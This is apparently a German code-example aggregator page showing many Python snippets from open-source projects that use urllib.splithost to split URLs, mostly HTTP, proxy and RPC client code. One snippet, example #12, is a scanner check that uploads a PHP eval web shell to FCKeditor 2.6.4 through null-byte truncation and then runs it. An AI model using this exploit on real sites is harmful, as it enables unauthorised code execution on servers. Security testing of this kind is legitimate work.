Python splithost Beispiele, urllib.splithost Python Beispiele

Beispiel #1

0

Datei anzeigen

Datei: erp5_url_checker.py Projekt: Verde1705/erp5

    def open_http(self, url, data=None):
        """Use HTTP protocol."""
        import httplib
        user_passwd = None
        if type(url) is type(""):
            host, selector = splithost(url)
            if host:
                user_passwd, host = splituser(host)
                host = unquote(host)
            realhost = host
        else:
            host, selector = url
            urltype, rest = splittype(selector)
            url = rest
            user_passwd = None
            if string.lower(urltype) != 'http':
                realhost = None
            else:
                realhost, rest = splithost(rest)
                if realhost:
                    user_passwd, realhost = splituser(realhost)
                if user_passwd:
                    selector = "%s://%s%s" % (urltype, realhost, rest)
            #print "proxy via http:", host, selector
        if not host: raise IOError, ('http error', 'no host given')
        if user_passwd:
            import base64
            auth = string.strip(base64.encodestring(user_passwd))
        else:
            auth = None
        h = httplib.HTTP(host)
        if data is not None:
            h.putrequest('POST', selector)
            h.putheader('Content-type', 'application/x-www-form-urlencoded')
            h.putheader('Content-length', '%d' % len(data))
        else:
            h.putrequest('GET', selector)
        for cookie in self.cookies.items():
            h.putheader('Cookie', '%s=%s;' % cookie)

        if auth: h.putheader('Authorization', 'Basic %s' % auth)
        if realhost: h.putheader('Host', realhost)
        for args in self.addheaders: apply(h.putheader, args)
        h.endheaders()
        if data is not None:
            h.send(data + '\r\n')
        errcode, errmsg, headers = h.getreply()
        if headers and headers.has_key('set-cookie'):
            cookies = headers.getallmatchingheaders('set-cookie')
            for cookie in cookies: self.cookies.load(cookie)

        fp = h.getfile()
        if errcode == 200:
            return addinfourl(fp, headers, "http:" + url)
        else:
            if data is None:
                return self.http_error(url, fp, errcode, errmsg, headers)
            else:
                return self.http_error(url, fp, errcode, errmsg, headers, data)

Beispiel #2

0

Datei anzeigen

Datei: test.py Projekt: resistivecorpse/Limnoria

def open_http(url, data=None):
    """Use HTTP protocol."""
    import httplib
    user_passwd = None
    proxy_passwd= None
    if isinstance(url, str):
        host, selector = urllib.splithost(url)
        if host:
            user_passwd, host = urllib.splituser(host)
            host = urllib.unquote(host)
        realhost = host
    else:
        host, selector = url
        # check whether the proxy contains authorization information
        proxy_passwd, host = urllib.splituser(host)
        # now we proceed with the url we want to obtain
        urltype, rest = urllib.splittype(selector)
        url = rest
        user_passwd = None
        if urltype.lower() != 'http':
            realhost = None
        else:
            realhost, rest = urllib.splithost(rest)
            if realhost:
                user_passwd, realhost = urllib.splituser(realhost)
            if user_passwd:
                selector = "%s://%s%s" % (urltype, realhost, rest)
            if urllib.proxy_bypass(realhost):
                host = realhost

        #print "proxy via http:", host, selector
    if not host: raise IOError, ('http error', 'no host given')

    if proxy_passwd:
        import base64
        proxy_auth = base64.b64encode(proxy_passwd).strip()
    else:
        proxy_auth = None

    if user_passwd:
        import base64
        auth = base64.b64encode(user_passwd).strip()
    else:
        auth = None
    c = FakeHTTPConnection(host)
    if data is not None:
        c.putrequest('POST', selector)
        c.putheader('Content-Type', 'application/x-www-form-urlencoded')
        c.putheader('Content-Length', '%d' % len(data))
    else:
        c.putrequest('GET', selector)
    if proxy_auth: c.putheader('Proxy-Authorization', 'Basic %s' % proxy_auth)
    if auth: c.putheader('Authorization', 'Basic %s' % auth)
    if realhost: c.putheader('Host', realhost)
    for args in urllib.URLopener().addheaders: c.putheader(*args)
    c.endheaders()
    return c

Beispiel #3

0

Datei anzeigen

Datei: m2urllib.py Projekt: rodrigc/m2crypto

def open_https(self, url, data=None, ssl_context=None):
    if ssl_context is not None and isinstance(ssl_context, SSL.Context):
        self.ctx = ssl_context
    else:
        self.ctx = SSL.Context(DEFAULT_PROTOCOL)
    user_passwd = None
    if isinstance(url, basestring):
        host, selector = urllib.splithost(url)
        if host:
            user_passwd, host = urllib.splituser(host)
            host = urllib.unquote(host)
        realhost = host
    else:
        host, selector = url
        urltype, rest = urllib.splittype(selector)
        url = rest
        user_passwd = None
        if urltype.lower() != 'http':
            realhost = None
        else:
            realhost, rest = urllib.splithost(rest)
            if realhost:
                user_passwd, realhost = urllib.splituser(realhost)
            if user_passwd:
                selector = "%s://%s%s" % (urltype, realhost, rest)
        # print("proxy via http:", host, selector)
    if not host:
        raise IOError('http error', 'no host given')
    if user_passwd:
        import base64
        auth = base64.encodestring(user_passwd).strip()
    else:
        auth = None
    # Start here!
    h = httpslib.HTTPSConnection(host=host, ssl_context=self.ctx)
    # h.set_debuglevel(1)
    # Stop here!
    if data is not None:
        h.putrequest('POST', selector)
        h.putheader('Content-type', 'application/x-www-form-urlencoded')
        h.putheader('Content-length', '%d' % len(data))
    else:
        h.putrequest('GET', selector)
    if auth:
        h.putheader('Authorization', 'Basic %s' % auth)
    for args in self.addheaders:
        apply(h.putheader, args)
    h.endheaders()
    if data is not None:
        h.send(data + '\r\n')
    # Here again!
    resp = h.getresponse()
    fp = resp.fp
    return urllib.addinfourl(fp, resp.msg, "https:" + url)

Beispiel #4

0

Datei anzeigen

def flushsquid():
    prefix = request.query.jsoncallback
    RawUrls = request.query.urls
    urlstype = int(request.query.urlstype)    
    LogKeyName = "key"+str(request.query.key)
    
    if RawUrls.strip() == "":
	DataDict = {'success':'0','text':'请输入需要刷新的URLS列表!'}    
	return prefix+"("+ujson.encode(DataDict)+")"
    else:
       RawUrls = RawUrls.strip(",") 
    
    UrlsList = RawUrls.split(",")
    
    QuitFlag = False
    PathList = []
    
    #判断收到的URL是否是同域名下同类型的URL(同是文件或目录)
    FirstUrl = UrlsList[0]
    proto,rest = urllib.splittype(FirstUrl)
    DomainName,path = urllib.splithost(rest)
    if "." in path:
        UrlType = "file"
    else:
        UrlType = "dir"
            
    for url in UrlsList:
        proto,rest = urllib.splittype(url)
        Thost,Tpath = urllib.splithost(rest)
        if "." in Tpath:
            TUrlType = "file"
        else:
            TUrlType = "dir"
        if DomainName != Thost or UrlType != TUrlType:
            QuitFlag = True
            break
        else:
            PathList.append(Tpath)

    if QuitFlag == False:
        try:
            #调用刷新类
            PurgeCacheObj =  exeCachePurge(UrlType,PathList,DomainName,LogKeyName)
            PurgeCacheObj.start()
        except Exception,e:
            DataDict =  {'success':'0','text':'%s'%e}
        else:
            DataDict =  {'success':'1'}

Beispiel #5

0

Datei anzeigen

Datei: check_extern.py Projekt: pyropeter/PyroBot-1G

 def open_http(self, url):
     """Use HTTP protocol."""
     if isinstance(url, str):
         host, selector = urllib.splithost(url)
         if host:
             user_passwd, host = urllib.splituser(host)
             host = urllib.unquote(host)
         realhost = host
     else:
         host, selector = url
         urltype, rest = urllib.splittype(selector)
         url = rest
         user_passwd = None
         if urltype.lower() != "http":
             realhost = None
         else:
             realhost, rest = splithost(rest)
             if realhost:
                 user_passwd, realhost = splituser(realhost)
             if user_passwd:
                 selector = "%s://%s%s" % (urltype, realhost, rest)
             if proxy_bypass(realhost):
                 host = realhost
     if not host:
         return -2
     h = httplib.HTTP(host)
     h.putrequest("GET", selector)
     if realhost:
         h.putheader("Host", realhost)
     for args in self.addheaders:
         h.putheader(*args)
     h.endheaders()
     errcode, errmsg, headers = h.getreply()
     return errcode

Beispiel #6

0

Datei anzeigen

Datei: ec2_boto.py Projekt: HPCNow/elasticluster

    def __init__(self, ec2_url, ec2_region, ec2_access_key, ec2_secret_key,
                 vpc=None, storage_path=None, request_floating_ip=False):
        self._url = ec2_url
        self._region_name = ec2_region
        self._access_key = ec2_access_key
        self._secret_key = ec2_secret_key
        self._vpc = vpc
        self.request_floating_ip = request_floating_ip

        # read all parameters from url
        proto, opaqueurl = urllib.splittype(ec2_url)
        self._host, self._ec2path = urllib.splithost(opaqueurl)
        self._ec2host, port = urllib.splitport(self._host)

        if port:
            port = int(port)
        self._ec2port = port

        if proto == "https":
            self._secure = True
        else:
            self._secure = False

        # will be initialized upon first connect
        self._ec2_connection = None
        self._vpc_connection = None
        self._vpc_id = None
        self._region = None

        self._instances = {}
        self._cached_instances = []
        self._images = None

Beispiel #7

0

Datei anzeigen

Datei: rhn-clone-errata.py Projekt: NehaRawat/spacewalk

    def request(self, host, handler, request_body, verbose=0):
        type, r_type = splittype(self.proxy)

        if 'http' in type:
            phost, XXX = splithost(r_type)
        else:
            phost = self.proxy

        puser_pass = None
        if '@' in phost:
            user_pass, phost = phost.split('@', 1)
            if ':' in user_pass:
                user, password = user_pass.split(':', 1)
                puser_pass = base64.encodestring('%s:%s' % (unquote(user),unquote(password))).strip()

        urlopener = urllib.FancyURLopener({'http':'http://%s'%phost})
        if not puser_pass:
            urlopener.addheaders = [('User-agent', self.user_agent)]
        else:
            urlopener.addheaders = [('User-agent', self.user_agent),('Proxy-authorization', 'Basic ' + puser_pass)]

        host = unquote(host)
        f = urlopener.open("http://%s%s"%(host,handler), request_body)

        self.verbose = verbose
        return self.parse_response(f)

Beispiel #8

0

Datei anzeigen

Datei: urllib2.py Projekt: Oize/pspstacklesspython

    def do_request_(self, request):
        host = request.get_host()
        if not host:
            raise URLError('no host given')

        if request.has_data():  # POST
            data = request.get_data()
            if not request.has_header('Content-type'):
                request.add_unredirected_header(
                    'Content-type',
                    'application/x-www-form-urlencoded')
            if not request.has_header('Content-length'):
                request.add_unredirected_header(
                    'Content-length', '%d' % len(data))

        scheme, sel = splittype(request.get_selector())
        sel_host, sel_path = splithost(sel)
        if not request.has_header('Host'):
            request.add_unredirected_header('Host', sel_host or host)
        for name, value in self.parent.addheaders:
            name = name.capitalize()
            if not request.has_header(name):
                request.add_unredirected_header(name, value)

        return request

Beispiel #9

0

Datei anzeigen

Datei: test_threaded_downloader.py Projekt: pulp/nectar

    def test_empty_string_proxy_username(self):
        """
        Yoram Hekma submitted a patch[0] that ensured that an empty string in the proxy username
        would not count as the user supplying a username. This test ensures that behavior is tested.

        [0] https://github.com/pulp/nectar/pull/47
        """
        kwargs = {'proxy_url': 'https://invalid-proxy.com',
                  'proxy_port': 1234,
                  'proxy_username': '',
                  'proxy_password': ''}
        proxy_host = urllib.splithost(urllib.splittype(kwargs['proxy_url'])[1])[0]

        cfg = config.DownloaderConfig(**kwargs)
        session = threaded.build_session(cfg)

        self.assertEqual(session.stream, True)
        self.assertFalse(hasattr(session.auth, 'proxy_username'))
        self.assertFalse(hasattr(session.auth, 'proxy_password'))

        # Since the user provided the empty string for the proxy username, the username and password
        # should be missing in the session proxies.
        self.assertEqual(session.proxies,
                         {'http': 'https://%s:%d' % (proxy_host, kwargs['proxy_port']),
                          'https': 'https://%s:%d' % (proxy_host, kwargs['proxy_port'])})

Beispiel #10

0

Datei anzeigen

Datei: base.py Projekt: lls3018/mdmi

 def parse_callback_url(self, callback_url):
     proto, rest = urllib.splittype(callback_url)
     host, rest = urllib.splithost(rest)
     host, port = urllib.splitport(host)
     if not port:
         port = 443
     return host, port

Beispiel #11

0

Datei anzeigen

Datei: test_threaded_downloader.py Projekt: hennessy80/nectar

    def test_build_session(self):
        kwargs = {'basic_auth_username': '******',
                  'basic_auth_password': '******',
                  'ssl_validation': False,
                  'ssl_client_cert_path': os.path.join(_find_data_directory(), 'pki/bogus/cert.pem'),
                  'ssl_client_key_path': os.path.join(_find_data_directory(), 'pki/bogus/key.pem'),
                  'proxy_url': 'https://invalid-proxy.com',
                  'proxy_port': 1234,
                  'proxy_username': '******',
                  'proxy_password': '******'}
        proxy_host = urllib.splithost(urllib.splittype(kwargs['proxy_url'])[1])[0]

        cfg = config.DownloaderConfig(**kwargs)
        session = threaded.build_session(cfg)

        self.assertEqual(session.stream, True)
        self.assertEqual(session.auth, (kwargs['basic_auth_username'], kwargs['basic_auth_password']))
        self.assertEqual(session.cert, (kwargs['ssl_client_cert_path'], kwargs['ssl_client_key_path']))
        self.assertEqual(session.proxies, {'http': 'https://%s:%s@%s:%d' % (kwargs['proxy_username'],
                                                                            kwargs['proxy_password'],
                                                                            proxy_host,
                                                                            kwargs['proxy_port']),
                                           'https': 'http://%s:%s@%s:%d' % (kwargs['proxy_username'],
                                                                            kwargs['proxy_password'],
                                                                            proxy_host,
                                                                            kwargs['proxy_port'])})

Beispiel #12

0

Datei anzeigen

Datei: fckeditor_2_6_4_file_upload.py Projekt: psyray/WebSecurity

    def verify(self):
        url = self.target
        filename = "ice.gif"
        foldername = "ice.php%00.gif"
        connector = "editor/filemanager/connectors/php/connector.php";
        proto, rest = urllib.splittype(url)
        host, rest = urllib.splithost(rest)
        payload = "-----------------------------265001916915724\r\n"
        payload += "Content-Disposition: form-data; name=\"NewFile\"; filename=\"ice.gif\"\r\n"
        payload += "Content-Type: image/jpeg\r\n\r\n"
        payload += 'GIF89a'+"\r\n"+'<?php eval($_POST[ice]) ?>'+"\n"
        payload += "-----------------------------265001916915724--\r\n"
        packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder="+foldername+" HTTP/1.0\r\n";
        packet += "Host: "+ host +"\r\n"
        packet += "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n"
        packet += "Content-Length: "+ str(len(payload))+"\r\n"
        packet += "Connection: close\r\n\r\n"
        packet += payload
        webshell_url = url + '/uploadfile/file/ice.php'
        urllib2.urlopen(url, data=packet,timeout=5)
        request = urllib2.Request(webshell_url, data="e=echo strrev(gwesdvjvncqwdijqiwdqwduhq);")
        response = urllib2.urlopen(request).read()

        if 'gwesdvjvncqwdijqiwdqwduhq'[::-1] in response:
            self.result['status'] = True
            self.result['info'] = "目标存在fckeditor 2.6.4 %00截断任意文件上传漏洞, webshell: %s 密码ice" % webshell_url

Beispiel #13

0

Datei anzeigen

Datei: xmlrpc.py Projekt: Jude7/minos

    def __init__(self, username=None, password=None, serverurl=None):
        self.username = username
        self.password = password
        self.verbose = False
        self.serverurl = serverurl
        if serverurl.startswith("http://"):
            type, uri = urllib.splittype(serverurl)
            host, path = urllib.splithost(uri)
            host, port = urllib.splitport(host)
            if port is None:
                port = 80
            else:
                port = int(port)

            def get_connection(host=host, port=port):
                return httplib.HTTPConnection(host, port)

            self._get_connection = get_connection
        elif serverurl.startswith("unix://"):

            def get_connection(serverurl=serverurl):
                # we use 'localhost' here because domain names must be
                # < 64 chars (or we'd use the serverurl filename)
                conn = UnixStreamHTTPConnection("localhost")
                conn.socketfile = serverurl[7:]
                return conn

            self._get_connection = get_connection
        else:
            raise ValueError("Unknown protocol for serverurl %s" % serverurl)

Beispiel #14

0

Datei anzeigen

Datei: threaded.py Projekt: pulp/nectar

def _add_proxy(session, config):
    if None in (config.proxy_url, config.proxy_port):
        return

    # Set session.proxies according to given url and port
    protocol, remainder = urllib.splittype(config.proxy_url)
    host, remainder = urllib.splithost(remainder)
    url = ':'.join((host, str(config.proxy_port)))

    if config.proxy_username:
        password_part = config.get('proxy_password', '') and ':%s' % config.proxy_password
        auth = config.proxy_username + password_part
        auth = urllib.quote(auth, safe=':')
        url = '@'.join((auth, url))

    session.proxies['https'] = '://'.join((protocol, url))
    session.proxies['http'] = '://'.join((protocol, url))

    # Set session.auth if proxy username is specified
    if config.proxy_username is not None:
        proxy_password = config.get('proxy_password', '')
        if None in (config.basic_auth_username, config.basic_auth_password):
            # bz 1021662 - Proxy authentiation using username and password in session.proxies urls
            # does not setup correct headers in the http download request because of a bug in
            # urllib3. This is an alternate approach which sets up the headers correctly.
            session.auth = requests.auth.HTTPProxyAuth(config.proxy_username, proxy_password)
        else:
            # The approach mentioned above works well except when a basic user authentication is
            # used, along with the proxy authentication. Therefore, we define and use a custom class
            # which inherits AuthBase class provided by the requests library to add the headers
            # correctly.
            session.auth = HTTPBasicWithProxyAuth(config.basic_auth_username,
                                                  config.basic_auth_password,
                                                  config.proxy_username,
                                                  proxy_password)

Beispiel #15

0

Datei anzeigen

Datei: host.py Projekt: heyLinsir/railgun

    def compile(self):
        """Validate the user submitted url address at compile stage.

        The url address will be tested with the configured regex patterns
        loaded from :attr:`BaseHost.compiler_params`.
        Refer to :ref:`hwnetapi` for more details about the rules.
        """
        if self.config['urlrule']:
            p = re.compile(self.config['urlrule'])
            if not p.match(self.config['remote_addr']):
                raise NetApiAddressRejected(compile_error=lazy_gettext(
                    'Address "%(url)s" does not match pattern "%(rule)s"',
                    url=self.config['remote_addr'], rule=self.config['urlrule']
                ))
        if self.config['iprule']:
            domain = urllib.splitport(
                urllib.splithost(
                    urllib.splittype(self.config['remote_addr'])[1]
                )[0]
            )[0]
            # get ip from domain
            try:
                ipaddr = socket.gethostbyname(domain)
            except Exception:
                logger.exception(
                    'Could not get ip address for domain "%s".' % domain)
                ipaddr = '<invalid>'
            # ip not match, skip
            p = re.compile(self.config['iprule'])
            if not p.match(ipaddr):
                raise NetApiAddressRejected(compile_error=lazy_gettext(
                    'IP address "%(ip)s" does not match pattern "%(rule)s"',
                    ip=ipaddr, rule=self.config['iprule']
                ))

Beispiel #16

0

Datei anzeigen

Datei: jsonrpc.py Projekt: Inter-Actief/jsonrpclib

 def __init__(self, uri, transport=None, encoding=None,
              verbose=0, version=None):
     import urllib
     if not version:
         version = config.version
     self.__version = version
     schema, uri = urllib.splittype(uri)
     if schema not in ('http', 'https', 'unix'):
         raise IOError('Unsupported JSON-RPC protocol.')
     if schema == 'unix':
         if not USE_UNIX_SOCKETS:
             # Don't like the "generic" Exception...
             raise UnixSocketMissing("Unix sockets not available.")
         self.__host = uri
         self.__handler = '/'
     else:
         self.__host, self.__handler = urllib.splithost(uri)
         if not self.__handler:
             # Not sure if this is in the JSON spec?
             # self.__handler = '/'
             self.__handler == '/'
     if transport is None:
         if schema == 'unix':
             transport = UnixTransport()
         elif schema == 'https':
             transport = SafeTransport()
         else:
             transport = Transport()
     self.__transport = transport
     self.__encoding = encoding
     self.__verbose = verbose

Beispiel #17

0

Datei anzeigen

Datei: proxy.py Projekt: admintecriti/sqlmap

    def request(self, method, url, body=None, headers={}):
        # Request is called before connect, so can interpret url and get
        # real host/port to be used to make CONNECT request to proxy
        proto, rest = urllib.splittype(url)

        if proto is None:
            raise ValueError, "unknown URL type: %s" % url

        # Get host
        host, rest = urllib.splithost(rest)

        # Try to get port
        host, port = urllib.splitport(host)

        # If port is not defined try to get from proto
        if port is None:
            try:
                port = self._ports[proto]
            except KeyError:
                raise ValueError, "unknown protocol for: %s" % url

        self._real_host = host
        self._real_port = int(port)

        httplib.HTTPConnection.request(self, method, rest, body, headers)

Beispiel #18

0

Datei anzeigen

Datei: network.py Projekt: leonardcj/readetexts

    def start(self, destfile=None, destfd=None):
        urllib._urlopener = OLPCURLopener()
        self._info = urllib.urlopen(self._url)
        self._outf = None
        self._fname = None
        if destfd and not destfile:
            raise ValueError('Must provide destination file too when'
                             ' specifying file descriptor')
        if destfile:
            self._suggested_fname = os.path.basename(destfile)
            self._fname = os.path.abspath(os.path.expanduser(destfile))
            if destfd:
                # Use the user-supplied destination file descriptor
                self._outf = destfd
            else:
                self._outf = os.open(self._fname, os.O_RDWR |
                                     os.O_TRUNC | os.O_CREAT, 0644)
        else:
            fname = self._get_filename_from_headers(self._info.headers)
            self._suggested_fname = fname
            garbage_, path = urllib.splittype(self._url)
            garbage_, path = urllib.splithost(path or "")
            path, garbage_ = urllib.splitquery(path or "")
            path, garbage_ = urllib.splitattr(path or "")
            suffix = os.path.splitext(path)[1]
            (self._outf, self._fname) = tempfile.mkstemp(suffix=suffix,
                                                         dir=self._destdir)

        fcntl.fcntl(self._info.fp.fileno(), fcntl.F_SETFD, os.O_NDELAY)
        self._srcid = GObject.io_add_watch(self._info.fp.fileno(),
                                           GObject.IO_IN | GObject.IO_ERR,
                                           self._read_next_chunk)

Beispiel #19

0

Datei anzeigen

Datei: jiangxi_spider.py Projekt: cfhb/uds-spider

    def stripy_article_list(self, section_name, page_num):
        try:
            self.cur_page = page_num
            article_list = []
            if page_num == 0:
                url = self.section_url_map[section_name]
            else:
                url = self.section_url_map[section_name][0:-8] + '_' + str(self.cur_page) + '.shtml'

            contentHtml = self.session.get(url, stream=True)
            encoding = chardet.detect(contentHtml.content)['encoding']

            if contentHtml.status_code == requests.codes.ok:
                pattern = r'<a href=\'(.*?)\'.*?<font class=a19_articlelist>(.*?)</a>.*?>(.*?)</td>'
                for mtFind in re.finditer(pattern, contentHtml.content, re.S):
                    if mtFind.groups()[0][0:4] == "http":
                        article_url = mtFind.groups()[0]
                    else:
                        proto,rest = urllib.splittype( self.section_url_map[section_name])
                        article_url = proto + "://" + urllib.splithost( rest )[0] + "/" + mtFind.groups()[0].strip("../")


                    public_time = self.strip_tags(mtFind.groups()[2])
                    title = mtFind.groups()[1].decode(encoding)

                    item = article_item(article_url, title, public_time)
                    item.set_section_name(section_name)
                    article_list.append(item)
            else:
                self.logger.error(u'没有获取到文章列表 ' + str(page_num) )
        except BaseException, e:
            self.logger.error(str(e))

Beispiel #20

0

Datei anzeigen

Datei: Client.py Projekt: Fulo/SOAPpy

    def __init__(self, url, config = Config):
        proto, uri = urllib.splittype(url)

        # apply some defaults
        if uri[0:2] != '//':
            if proto != None:
                uri = proto + ':' + uri

            uri = '//' + uri
            proto = 'http'

        host, path = urllib.splithost(uri)

        try:
            int(host)
            host = 'localhost:' + host
        except:
            pass

        if not path:
            path = '/'

        if proto not in ('http', 'https', 'httpg'):
            raise IOError, "unsupported SOAP protocol"
        if proto == 'httpg' and not config.GSIclient:
            raise AttributeError, \
                  "GSI client not supported by this Python installation"
        if proto == 'https' and not config.SSLclient:
            raise AttributeError, \
                "SSL client not supported by this Python installation"

        self.user,host = urllib.splituser(host)
        self.proto = proto
        self.host = host
        self.path = path

Beispiel #21

0

Datei anzeigen

Datei: urllib2.py Projekt: paulgay/crf_dia_ident

    def do_open(self, http_class, req):
        host = req.get_host()
        if not host:
            raise URLError('no host given')

        h = http_class(host) # will parse host:port
        if req.has_data():
            data = req.get_data()
            h.putrequest('POST', req.get_selector())
            if not req.headers.has_key('Content-type'):
                h.putheader('Content-type',
                            'application/x-www-form-urlencoded')
            if not req.headers.has_key('Content-length'):
                h.putheader('Content-length', '%d' % len(data))
        else:
            h.putrequest('GET', req.get_selector())

        scheme, sel = splittype(req.get_selector())
        sel_host, sel_path = splithost(sel)
        h.putheader('Host', sel_host or host)
        for args in self.parent.addheaders:
            h.putheader(*args)
        for k, v in req.headers.items():
            h.putheader(k, v)
        # httplib will attempt to connect() here.  be prepared
        # to convert a socket error to a URLError.
        try:
            h.endheaders()
        except socket.error, err:
            raise URLError(err)

Beispiel #22

0

Datei anzeigen

Datei: ximian_xmlrpclib.py Projekt: joeshaw/rcd

    def __init__(self, uri, transport=None, encoding=None, verbose=0, auth_username=None, auth_password=None):
        # establish a "logical" server connection

        # get the url
        import urllib

        type, uri = urllib.splittype(uri)
        if type:
            if type not in ("http", "https"):
                raise IOError, "unsupported XML-RPC protocol"
            self.__host, self.__handler = urllib.splithost(uri)
            if not self.__handler:
                self.__handler = "/RPC2"

            if transport is None:
                if type == "https":
                    transport = SafeTransport()
                else:
                    transport = Transport()
        else:
            self.__host = uri
            transport = RawTransport()

        self.__transport = transport

        self.__encoding = encoding
        self.__verbose = verbose

        self.__username = auth_username
        self.__password = auth_password

Beispiel #23

0

Datei anzeigen

Datei: proxysupport.py Projekt: andreashe/mygitsite

 def request(self, method, url, body=None, headers={}):
     """
     Make CONNECT request to proxy.
     """
         
     proto, rest = urllib.splittype(url)
     if proto is None:
         raise ValueError, "unknown URL type: %s" % url
         
     # Get hostname.
     host = urllib.splithost(rest)[0]
     
     # Get port of one
     host, port = urllib.splitport(host)
     
     # When no port use hardcoded.
     if port is None:
         try:
             port = self._ports[proto]
         except KeyError:
             raise ValueError, "unknown protocol for: %s" % url
     
     # Remember.        
     self._real_host = host
     self._real_port = port
     
     # Remember auth if there.
     if headers.has_key("Proxy-Authorization"):
         self._proxy_authorization = headers["Proxy-Authorization"]
         del headers["Proxy-Authorization"]
     else:
         self._proxy_authorization = None
     
     httplib.HTTPConnection.request(self, method, url, body, headers)

Beispiel #24

0

Datei anzeigen

Datei: remote.py Projekt: harsh-a1/repeater-testing

 def __init__(self, url, _client=None):
     Transport.__init__(self, url)
     (scheme, _, loc, _, _) = urlparse.urlsplit(url)
     assert scheme == "git"
     hostport, self._path = urllib.splithost(loc)
     (self._host, self._port) = urllib.splitnport(hostport, git.protocol.TCP_GIT_PORT)
     self._client = _client

Beispiel #25

0

Datei anzeigen

Datei: rpc_wrapper.py Projekt: dewayneHat/spacewalk

    def init_server(self, myuri):
        #Borrowed the following from rpcServer.py
        #rpclib.Server.__init__(self, uri, transport=self.rpc_args['transport'], encoding=self.rpc_args['encoding'], verbose=self.rpc_args['verbose'],\
        #                              proxy=self.rpc_args['proxy'], username=self.rpc_args['username'],\
        #                              password=self.rpc_args['password'], refreshCallback=self.rpc_args['refreshCallback'],\
        #                              progressCallback=self.rpc_args['progressCallback'])
        self._uri = myuri
        typ, uri = urllib.splittype(self._uri)
        typ = typ.lower()
        if typ not in ("http", "https"):
            raise InvalidRedirectionError(
                "Redirected to unsupported protocol %s" % typ)

        self._host, self._handler = urllib.splithost(uri)
        self._orig_handler = self._handler
        self._type = typ
        if not self._handler:
            self._handler = self.rpc_handler
        self._allow_redirect = 1
        del self._transport
        self._transport = self.default_transport(typ, self._proxy,
                                             self._username, self._password)
        self.set_progress_callback(self._progressCallback)
        self.set_refresh_callback(self._refreshCallback)
        self.set_buffer_size(self._bufferSize)
        self.setlang(self._lang)

        if self._trusted_cert_files != [] and \
            hasattr(self._transport, "add_trusted_cert"):
            for certfile in self._trusted_cert_files:
                self._transport.add_trusted_cert(certfile)

Beispiel #26

0

Datei anzeigen

Datei: GBXXMLRPC.py Projekt: Lavos/panda

    def __init__(self, uri, transport=None, encoding=None, verbose=0,
                 allow_none=0, use_datetime=0):
        # establish a "logical" server connection
        if DEBUG: print "[Proxy.__init__(%s, %s, %s, %s, %s, %s)]" % \
            (uri, transport, encoding, verbose, allow_none, use_datetime)
        # get the url
        import urllib
        type, host = urllib.splittype(uri)
        if type.lower() != "gbx":
            try:
                # Parameter use_datetime is available since Python 2.5
                xmlrpclib.ServerProxy.__init__(self, uri, transport, encoding,
                    verbose, allow_none, use_datetime)
            except TypeError:
                xmlrpclib.ServerProxy.__init__(self, uri, transport, encoding,
                    verbose, allow_none)
        else:
            self._ServerProxy__host, self._ServerProxy__handler = urllib.splithost(host)
            if not self._ServerProxy__handler:
                self._ServerProxy__handler = "/RPC2"

            self._ServerProxy__transport = transport or Transport(use_datetime)
            self._ServerProxy__encoding = encoding
            self._ServerProxy__verbose = verbose
        if DEBUG: print type, self._ServerProxy__host, \
            self._ServerProxy__handler, self._ServerProxy__transport, \
            self._ServerProxy__encoding, self._ServerProxy__verbose

Beispiel #27

0

Datei anzeigen

Datei: connect_HTTP_handler.py Projekt: pombredanne/ensetuptools

    def _get_real_authority(self):
        """
        Return the authority specification of the originally requested URL.

        The return value is a string of the form <host>:<port>.

        """

        url = self._proxy_request.get_selector()

        proto, rest = urllib.splittype(url)
        if proto is None:
            raise ValueError("unknown URL type: %s" % url)

        # Get the host and port specification
        host, rest = urllib.splithost(rest)
        host, port = urllib.splitport(host)

        # If port is not defined, then try to get it from the protocol.
        if port is None:
            try:
                port = self._ports[proto]
            except KeyError:
                raise ValueError("unknown protocol for: %s" % url)

        return '%s:%d' % (host, port)

Beispiel #28

0

Datei anzeigen

Datei: ra_svn.py Projekt: lygstate/subvertpy

 def __init__(self, url, progress_cb=None, auth=None, config=None, 
              client_string_func=None, open_tmp_file_func=None):
     self.url = url
     (type, opaque) = urllib.splittype(url)
     assert type in ("svn", "svn+ssh")
     (host, path) = urllib.splithost(opaque)
     self._progress_cb = progress_cb
     self._auth = auth
     self._config = config
     self._client_string_func = client_string_func
     # open_tmp_file_func is ignored, as it is not needed for svn://
     if type == "svn":
         (recv_func, send_func) = self._connect(host)
     else:
         (recv_func, send_func) = self._connect_ssh(host)
     super(SVNClient, self).__init__(recv_func, send_func)
     (min_version, max_version, _, self._server_capabilities) = self._recv_greeting()
     self.send_msg([max_version, [literal(x) for x in CAPABILITIES if x in self._server_capabilities], self.url])
     (self._server_mechanisms, mech_arg) = self._unpack()
     if self._server_mechanisms != []:
         # FIXME: Support other mechanisms as well
         self.send_msg([literal("ANONYMOUS"), [base64.b64encode("anonymous@%s" % socket.gethostname())]])
         self.recv_msg()
     msg = self._unpack()
     if len(msg) > 2:
         self._server_capabilities += msg[2]
     (self._uuid, self._root_url) = msg[0:2]
     self.busy = False

Beispiel #29

0

Datei anzeigen

Datei: urllib2.py Projekt: JoJoBond/The-Powder-Toy

    def do_request_(self, request):
        host = request.get_host()
        if not host:
            raise URLError("no host given")

        if request.has_data():  # POST
            data = request.get_data()
            if not request.has_header("Content-type"):
                request.add_unredirected_header("Content-type", "application/x-www-form-urlencoded")
            if not request.has_header("Content-length"):
                request.add_unredirected_header("Content-length", "%d" % len(data))

        sel_host = host
        if request.has_proxy():
            scheme, sel = splittype(request.get_selector())
            sel_host, sel_path = splithost(sel)

        if not request.has_header("Host"):
            request.add_unredirected_header("Host", sel_host)
        for name, value in self.parent.addheaders:
            name = name.capitalize()
            if not request.has_header(name):
                request.add_unredirected_header(name, value)

        return request

Beispiel #30

0

Datei anzeigen

Datei: http.py Projekt: delaballe/KaraCos-Desktop

 def processRequest(self,method=None,url=None,data="",headers={}):
     conf = desktop.Config()
     if not conf['proxy']:
         self.proxy_host = None
         self.proxy_port = None
     else:
         self.proxy_host = conf['proxy']['proxy']
         self.proxy_port = conf['proxy']['proxy_port']
     socket.setdefaulttimeout(self.http_timeout)
     (protocol,resource) = urllib.splittype(url)
     (hostport,path) = urllib.splithost(resource)
     connexion = None
     if protocol.lower() == "http":
         (host,port) = urllib.splitnport(hostport, 80)
         import httplib
         if self.proxy_host != None and self.proxy_port != None :
             connexion = HTTPConnection(self.proxy_host, self.proxy_port, timeout=self.http_timeout)
             path = url
         else:
             connexion = HTTPConnection(host, port, timeout=self.http_timeout)
     elif protocol.lower() == "https" :
